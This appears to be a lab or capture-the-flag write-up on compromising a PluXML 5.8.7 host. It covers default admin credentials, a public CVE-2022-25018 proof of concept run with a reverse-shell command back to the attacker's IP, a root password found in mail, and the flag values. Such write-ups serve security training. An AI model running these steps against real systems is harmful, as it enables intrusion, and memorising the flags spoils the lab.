Service Discovery

Open Ports & Priority

TCP Ports:

  • 80
  • 22

Service Enumeration

80

The HTTP title and our scans from autorecon suggest that this is an instance of PluXML: https://www.pluxml.org

“Administration” link on the bottom of the page brings us to /core/admin.

Guessing admin:admin allows me to sign in.

The top left, under “Disconnect” shows that we’re signed in as the administrator and that this is PluXml version 5.8.7.

Quickly googling PluXml rce exploit, I found a GitHub issue in the project explaining that v5.8.16 or lower allows for RCE after gaining access to the admin dashboard as we have: https://github.com/pluxml/PluXml/issues/829

This was named CVE-2022-25018.

I found a POC exploit that I’ll try for conevnience: https://github.com/erlaplante/pluxml-rce

I’ll start a reverse shell listener: penelope -p 80

…and run the exploit… python3 pluxml.py http://192.168.195.28 admin admin 192.168.45.196 80

…to get a connection back on my listener as www-data:

Privilege Escalation

From linPEAS Did some research, nothing interesting…

We have mail! That’s unusual.

root:6s8kaZZNaZZYBMfh2YEW

This is accurate and allows us to log in as root!

Proof Screenshots (local.txt / proof.txt)

type or cat flag and include IP address in screenshot

/var/www/local.txt 8f8953d85431020e254b32a650a1e63c

/root/proof.txt 56cf7f04a492d738f3bf6ab54adc2a5a